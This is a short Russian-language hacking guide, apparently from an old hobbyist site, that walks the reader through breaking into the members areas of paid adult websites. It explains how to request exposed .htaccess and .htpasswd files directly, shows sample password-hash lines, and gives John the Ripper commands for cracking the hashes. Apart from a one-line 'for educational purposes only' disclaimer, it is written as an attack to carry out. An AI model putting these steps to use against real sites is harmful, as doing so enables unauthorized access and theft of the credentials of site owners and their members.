Как ломать ХХХ сайты.

Автор: pauk Сайт: http://www.pauk2001.h1.ru
   
   Шаг (1)
   Идите сами знаете куда и возьмите там работающий пароль к сайту который вы хотите взломать.
   
   Шаг (2)
   Затем вы должны войти на этот xxx сайт в "members section" ну например так www.xxxsite.com/members/index.html или типа этого..
   
   Шаг (3)
   Удалите слово index.html и наберите .htaccess например: www.xxxsite.com/members/.htaccess
   
   Если вам повезет вы получите нижеследующее:AuthUserFile /www/xxxsite/members/.htpasswd <- место где лежит файл с паролями.AuthGroupFile /dev/null <- место где лежит groupfileAuthName Members Only Directory <-место где находится popup который просит вас ввести password/loginAuthType Basic <- другие типы авторизации apache btw.
   Limit GET POST PUT <-require valid-user <-
   Но реально вся эта лабуда не нужна для начала если .htaccess прошел сразу вместо него пишите .htpasswd и все OK.
   
   Шаг (4), найдите passwordfile ( .htpasswd)
   
   Шаг (5), удалите .htaccess и вместо наберите ( .htpasswd )
   например :www.xxxsite.com/members/.htpasswd. После этого вы получите passwordlist. Пароли будут зашифрованы. Это будет выглядеть так:
   
   ocean:q8ERltHeoxRG.
   sydgator:458mLs4euQHwo
   demi1:o7ad9QtJIklTY
   demi2:Fx93hhGP/oTs6Y
   233244:ZXEHRGfdsL9E346
   Первое слово - логин , остальное после : пароли
   
   Шаг (6)
   Чтобы раскодировать пароли надо сначала скачать декодер ,например"John the ripper" .John the ripper расшифрует пароли на это уйдет примерно. ( 15000/сек. на 166mmx)
   Шаг (7), Сохраните полученные логины и паролиШаг (8), Разархивируйте John The Ripper и наберите: ( предварительно поместив текстовый файл в директорию где лежит ripper)
   John xxx.txt -single (Это самый быстрый способ и самый простой алгоритм.)
   
   John xxx.txt -wordfile:password.lst (Это посложней)
   
   John xxx.txt -incremental (Это самый сложный алгоритм и занимает время зато самый надежный)
   
   
   Текст представлен только для учебных целей.Не используйте его на практике. Использование может повлечь за собой проблемы.
   

Опубликовано: HTTP://WWW.R-T-F-M.INFO, pauk ©® 2000-2011.
All rights reserved.
При перепечатки ссылка на сайт обязательна.
Мнение администрации сайта не всегда совпадает с мнением автора..